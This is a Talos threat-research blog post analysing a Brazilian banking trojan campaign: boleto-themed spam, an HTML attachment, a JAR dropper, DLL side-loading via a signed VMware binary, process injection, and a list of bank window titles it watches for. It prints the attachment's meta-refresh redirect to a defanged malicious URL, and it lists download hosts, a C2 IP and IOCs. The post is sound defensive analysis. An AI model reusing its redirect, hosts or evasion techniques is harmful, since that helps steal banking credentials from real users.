Banking Trojan Attempts To Steal Brazillion$

2017-09-28T08:09:00
ID TALOSBLOG:3096DAA5EA04377DDBA74CE6DA546AEA
Type talosblog
Reporter noreply@blogger.com (Warren Mercer)
Modified 2017-10-12T06:59:25

Description

<br /><br />This post was authored by <a href="https://www.twitter.com/SecurityBeard/">Warren Mercer</a>, <a href="https://www.twitter.com/r00tbsd">Paul Rascagneres</a> and <a href="https://twitter.com/vanjasvajcer">Vanja Svajcer</a><br /><br /><h2 id="h.nnz5k5mrj4as">Introduction</h2><br />Banking trojans are among some of the biggest threats to everyday users as they directly impact the user in terms of financial loss. Talos recently observed a new campaign specific to South America, namely Brazil. This campaign was focused on various South American banks in an attempt to steal credentials from the user to allow for illicit financial gain for the malicious actors. The campaign Talos analysed focused on Brazilian users and also attempted to remain stealthy by using multiple methods of re-direction in an attempt to infect the victim machine. It also used multiple anti-analysis techniques and the final payload was written in Delphi which is quite unique to the banking trojan landscape.<br /><br /><a name='more'></a><br /><br /><h2 id="h.gy10kqw5mmko">Infection Vector</h2><div><br /></div><h3 id="h.hc0d0iga1b1a">Spam Example</h3><br />As with a lot of banking trojan campaigns, this one starts with a malicious spam campaign. Here is an example of an email used during this campaign. The attacker used an email written in Portuguese which makes it seemingly more legitimate for the user - receiving email in a native language gives the attackers a higher likelihood of achieving their mission objective, convincing the victim to open the malicious attachment.<br /><br /><a href="http://3.bp.blogspot.com/-YExZ87Jga64/Wc0K2xrYCCI/AAAAAAAAAVY/B0NjGvX98v0WOmtfWDwy8jZhvTNYZ32YACK4BGAYYCw/s1600/image2.png" imageanchor="1"><img border="0" height="298" src="https://3.bp.blogspot.com/-YExZ87Jga64/Wc0K2xrYCCI/AAAAAAAAAVY/B0NjGvX98v0WOmtfWDwy8jZhvTNYZ32YACK4BGAYYCw/s640/image2.png" width="640" /></a><br /><br />The email contains an HTML attachment named BOLETO_2248_.html, a Boleto refers to a type of invoice used in Brazil. The HTML document contains a simple redirection to a first website:<br /><br /><pre><html><br /><br /><head><br /><br /><title>2Via Boleto</title><br /><br /></head><br /><br /><body><br /><br /></body><br /><br /></html><br /><br /><meta http-equiv="refresh" content="0; url=http://priestsforscotland[.]org[.]uk/wp-content/themes/blessing/0032904.php"><br /><br /></pre><br /><h3 id="h.r71kjddgikf5">Redirection, Redirection and… Redirection</h3><br />The URL contained in the HTML attachment is a first redirect to a goo.gl URL shortener:<br /><br /><a href="http://1.bp.blogspot.com/-ZSAl-KV1OJ0/Wc0K7PPdbtI/AAAAAAAAAVg/NEW-D6R1TFEK3HuROjASEPalD48O5kdbgCK4BGAYYCw/s1600/image5.jpg" imageanchor="1"><img border="0" height="328" src="https://1.bp.blogspot.com/-ZSAl-KV1OJ0/Wc0K7PPdbtI/AAAAAAAAAVg/NEW-D6R1TFEK3HuROjASEPalD48O5kdbgCK4BGAYYCw/s640/image5.jpg" width="640" /></a><br /><br />A second redirect is performed by the goo.gl URL. This shortened URL points to hxxp://thirdculture[.]tv:80/wp/wp-content/themes/zerif-lite/97463986909837214092129.rar.<br /><br /><a href="http://4.bp.blogspot.com/-kEg_wPVzRj0/Wc0LS4gxZZI/AAAAAAAAAVo/m3gp7TaQCmEPaMrPwMVEljn1mJtHcvlrgCK4BGAYYCw/s1600/image6.jpg" imageanchor="1"><img border="0" height="280" src="https://4.bp.blogspot.com/-kEg_wPVzRj0/Wc0LS4gxZZI/AAAAAAAAAVo/m3gp7TaQCmEPaMrPwMVEljn1mJtHcvlrgCK4BGAYYCw/s640/image6.jpg" width="640" /></a><br /><br />Finally, the archive contains a JAR file named BOLETO_09848378974093798043.jar. If the user double clicks on the JAR file, java will execute the malicious code and will start the installation process of this banking trojan.<br /><br /><h3 id="h.857zq1ntm7si">Java Execution</h3><br />The first step of the Java code is to setup the working environment of the malware and to download additional files from hxxp://104[.]236[.]211[.]243/1409/pz.zip. The malware is working in the C:\Users\Public\Administrator\ directory which it creates as this is not a default folder. The new archive contains a new set of binaries. <br /><br /><a href="http://3.bp.blogspot.com/-6nfsCdP51KM/Wc0LbLbTakI/AAAAAAAAAVw/22RqIF1mWs4c002ed0_klMnjdEenNt48gCK4BGAYYCw/s1600/image7.png" imageanchor="1"><img border="0" height="520" src="https://3.bp.blogspot.com/-6nfsCdP51KM/Wc0LbLbTakI/AAAAAAAAAVw/22RqIF1mWs4c002ed0_klMnjdEenNt48gCK4BGAYYCw/s640/image7.png" width="640" /></a><br /><br />On the last step, the Java code renames the downloaded binaries and executes vm.png (previously renamed):<br /><br /><a href="http://4.bp.blogspot.com/-RpJStbo3-5E/Wc0Lds2qIVI/AAAAAAAAAV4/jgiVunLyH2wmo99dczVrGXi-WxB4y56aQCK4BGAYYCw/s1600/image8.png" imageanchor="1"><img border="0" height="70" src="https://4.bp.blogspot.com/-RpJStbo3-5E/Wc0Lds2qIVI/AAAAAAAAAV4/jgiVunLyH2wmo99dczVrGXi-WxB4y56aQCK4BGAYYCw/s640/image8.png" width="640" /></a><br /><br /><h2 id="h.h1woiklnbe54">Malware Loading</h2><br />The first executed binary is vm.png. It's a legitimate binary from VMware and is signed with a VMware digital signature.<br /><br /><a href="http://2.bp.blogspot.com/-Ur43h2-lC3o/Wc0Lg0AnzjI/AAAAAAAAAWA/3f2s7YTn_CYgsroQMc3bqsEI-hGglOjnwCK4BGAYYCw/s1600/image4.png" imageanchor="1"><img border="0" height="542" src="https://2.bp.blogspot.com/-Ur43h2-lC3o/Wc0Lg0AnzjI/AAAAAAAAAWA/3f2s7YTn_CYgsroQMc3bqsEI-hGglOjnwCK4BGAYYCw/s640/image4.png" width="640" /></a><br /><br />One of the dependencies of the binary is vmwarebase.dll:<br /><br /><pre>Python 2.7.12 (default, Nov 19 2016, 06:48:10)<br />[GCC 5.4.0 20160609] on linux2<br />Type "help", "copyright", "credits" or "license" for more information.<br />>>> import pefile<br />>>> pe = pefile.PE("vm.png")<br />>>> for entry in pe.DIRECTORY_ENTRY_IMPORT:<br />... print entry.dll<br /><br />...<br /><br />MSVCR90.dll<br />ADVAPI32.dll<br />vmwarebase.DLL<br />KERNEL32.dll<br /></pre>The vmwarebase.dll is not the legitimate binary but a malicious binary. This technique has been used previously by other actors such as PlugX. The idea behind this approach is that some security products have the following trust chain: if a first binary is trusted (vm.png in our case), the loaded libraries are automatically trusted. The loading technique can bypass some security checks.<br /><br />The purpose of the vmwarebase.dll code is to inject and execute the prs.png code in explorer.exe or in notepad.exe depending on the context of the user account. The injection is performed by allocating memory in the remote process and the usage of LoadLibrary() to load the gbs.png library. The API usage is obfuscated by encryption (AES):<br /><br /><a href="http://2.bp.blogspot.com/-Qr-KdnPBVr4/Wc0Lu3t_nDI/AAAAAAAAAWI/2biU21Ieyt0KxlyRt3pf2aSGLvSFT6EcACK4BGAYYCw/s1600/image3.png" imageanchor="1"><img border="0" height="360" src="https://2.bp.blogspot.com/-Qr-KdnPBVr4/Wc0Lu3t_nDI/AAAAAAAAAWI/2biU21Ieyt0KxlyRt3pf2aSGLvSFT6EcACK4BGAYYCw/s640/image3.png" width="640" /></a><br /><br />Once decrypted the <i>m5ba+5jOiltH7Mff7neiMumHl2s=</i> is LoadLibraryA and <i>QiF3gn1jEEw8XUGBTz0B5i5nkPY=</i> is kernel32.dll<br /><br /><h2 id="h.krt68nmkeqmx">Banking Trojan</h2><br />The main module of the banking trojan contains a lot of features. For example, it will attempt to terminate analyst processes such as taskmgr.exe (Task Manager), msconfig.exe (MsConfig), regedit.exe (Registry Editor) and <a href="http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html">ccleaner.exe</a> and <a href="http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html">ccleaner64.exe</a>. This module creates a autostart registry key which attempts to use a legitimate looking name: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Vmware Base.<br /><br />This module is used to get the title of the window in the foreground of the user. The purpose is to identify if the user has a windows with one the following title (these strings are encrypted in the sample):<br /><br />Navegador Exclusivo Sicoobnet Aplicativo Ita Internet Banking BNB Banestes Internet Banking Banrisul bb.com.br bancobrasil.com Banco do Brasil Autoatendimento Pessoa Física - Banco do Brasil internetbankingcaixa Caixa - A vida pede mais que um banco SICREDI Banco Bradesco S/A Internet Banking 30 horas Banestes Internet Banking Banrisul <br /><br />This list contains the targeted financial institutions located in Brazil. This trojan leveraged Web Injects to allow them to interact with the banking website. Another task performed by this main module is to execute the last binary: gps.png (renamed previously with the .drv extension) with rundll32.exe:<br /><br /><a href="http://2.bp.blogspot.com/-ELDyshdwoB0/Wc0MJ77bG-I/AAAAAAAAAWQ/-PHDf1ljHxQNrm19gvFImPLAGQ7tMGLtgCK4BGAYYCw/s1600/image1.png" imageanchor="1"><img border="0" height="316" src="https://2.bp.blogspot.com/-ELDyshdwoB0/Wc0MJ77bG-I/AAAAAAAAAWQ/-PHDf1ljHxQNrm19gvFImPLAGQ7tMGLtgCK4BGAYYCw/s640/image1.png" width="640" /></a><br /><br />This library is packed using Themida which has made it significantly difficult to unpack.<br /><br />The following debug strings were left in the samples analysed by the developer. The strings are in Portuguese:<br /><br /><pre><|DISPIDA|>Iniciou!<br /><|PRINCIPAL|><br /><|DISPIDA|>Abriu_IE<br /><|Desktop|><br /><|DISPIDA|>Startou!<br /><|Enviado|><br /></pre>These strings are sent to the C2 server when specific actions are performed on the infected system. The C2 configuration is stored in the i.dk plain text file (encrypted in AES 256). This file contains a date, an IP and additional configuration items:<br /><br /><pre>07082017<br />191.252.65.139<br />6532<br /></pre><h2 id="h.g3jygwb5fn45">Conclusion</h2><br />Banking trojans continue to form part of the threat landscape, they continually evolve and also can, like this specific example, be very specific to the region they are attacking. This often doesn't suggest the attackers are from that region but they have decided that there is perhaps less security conscious users living there. Financial gain will continue to be a huge motivator for attackers and as with this sample the evolution of the malware continues to grow. Using commercial packing platforms like Themida will continue to make analysis difficult for analysts and shows that some attackers are willing to obtain these types of commercial packers in an attempt to thwart analysis.<br /><br /><h2 id="h.kek0ptqaghy">Coverage</h2><br />Additional ways our customers can detect and block this threat are listed below.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-Z7N_NdAXg5w/Wd5A326hmcI/AAAAAAAAAag/Hei3WfxVMeU6-7g_SRAoSjyoAn8q1wHIwCLcBGAs/s1600/image10.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="268" data-original-width="320" src="https://3.bp.blogspot.com/-Z7N_NdAXg5w/Wd5A326hmcI/AAAAAAAAAag/Hei3WfxVMeU6-7g_SRAoSjyoAn8q1wHIwCLcBGAs/s1600/image10.png" /></a></div>Advanced Malware Protection (<a href="https://www.cisco.com/c/en/us/products/security/advanced-malware-protection">AMP</a>) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br /><a href="https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html">CWS</a> or<a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html"> WSA</a> web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br /><a href="https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html">Email Security</a> can block malicious emails sent by threat actors as part of their campaign.<br /><br />Network Security appliances such as<a href="https://www.cisco.com/c/en/us/products/security/firewalls/index.html"> </a><a href="https://www.cisco.com/c/en/us/products/security/firewalls/index.html">NGFW</a>,<a href="https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html"> </a><a href="https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html">NGIPS</a>, and<a href="https://meraki.cisco.com/products/appliances"> </a><a href="https://meraki.cisco.com/products/appliances">Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><a href="https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html">AMP Threat Grid</a> helps identify malicious binaries and build protection into all Cisco Security products.<br /><br /><a href="https://umbrella.cisco.com/">Umbrella</a>, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.<br /><br />Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href="https://www.snort.org/products">Snort.org</a>.<br /><br /><h2 id="h.690931o0tz4r">IOCs</h2><br />927d914f46715a9ed29810ed73f9464e4dadfe822ee09d945a04623fa3f4bc10 HTML attachment<br /><br />5730b4e0dd520caba11f9224de8cfd1a8c52e0cc2ee98b2dac79e40088fe681c RAR archive<br /><br />B76344ba438520a19fff51a1217e3c6898858f4d07cfe89f7b1fe35e30a6ece9 BOLETO_09848378974093798043.jar<br /><br />0ce1eac877cdd87fea25050b0780e354fe3b7d6ca96c505b2cd36ca319dc6cab gbs.png<br /><br />6d8c7760ac76af40b7f9cc4af31da8931cef0d9b4ad02aba0816fa2c24f76f10 i.dk<br /><br />56664ec3cbb228e8fa21ec44224d68902d1fbe20687fd88922816464ea5d4cdf prs.png<br /><br />641a58b667248fc1aec80a0d0e9a515ba43e6ca9a8bdd162edd66e58703f8f98 pz.zip<br /><br />79a68c59004e3444dfd64794c68528187e3415b3da58f953b8cc7967475884c2 vm.png<br /><br />969a5dcf8f42574e5b0c0adda0ff28ce310e0b72d94a92b70f23d06ca5b438be vmwarebase.dll<br /><br />http://priestsforscotland[.]org[.]uk<br /><br />http://thirdculture[.]tv:<br /><br />http://104[.]236[.]211[.]243<br /><br />191.252.65.139<br /><br /><br /><br /><div class="feedflare"> <a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=I1TlodeEh-4:DKkHZVi2Te8:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"></img></a> </div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/I1TlodeEh-4" height="1" width="1" alt=""/>